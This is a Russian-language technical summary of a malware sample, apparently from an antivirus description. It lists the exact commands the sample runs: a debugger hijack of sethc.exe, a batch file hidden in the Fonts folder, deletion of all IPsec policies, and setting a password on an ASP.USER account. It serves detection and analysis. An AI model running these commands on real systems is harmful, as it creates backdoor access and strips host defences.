Техническая информация
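- [<HKLM>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe] 'debugger' = 'taskmgr.exe' (параметр debugger в Image File Execution Options: при обращении к sethc.exe, «Залипание клавиш», в том числе на экране входа в систему, вместо него запускается taskmgr.exe; для обнаружения стоит отслеживать появление этого параметра у sethc.exe и других программ специальных возможностей)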
- %WINDIR%\Fonts\start.bat
- ClassName: 'RegEdit_RegEdit' WindowName: ''
- ClassName: 'EDIT' WindowName: ''
- '<SYSTEM32>\reg.exe' add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v debugger /t REG_SZ /d "taskmgr.exe" /f
- '%WINDIR%\regedit.exe' /s %WINDIR%\temp\1.reg
- '<SYSTEM32>\netsh.exe' ipsec static delete all (удаляет все политики IPsec, списки фильтров и действия фильтров в локальном хранилище политик)
- '<SYSTEM32>\cmd.exe' /c ""%WINDIR%\Fonts\start.bat" "
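- '<SYSTEM32>\net.exe' user ASP.USER ninos@zxczxc!123 /y
- '<SYSTEM32>\net1.exe' user ASP.USER ninos@zxczxc!123 /y (net.exe передаёт ту же команду net1.exe, поэтому запись повторяется; команда задаёт пароль учётной записи ASP.USER)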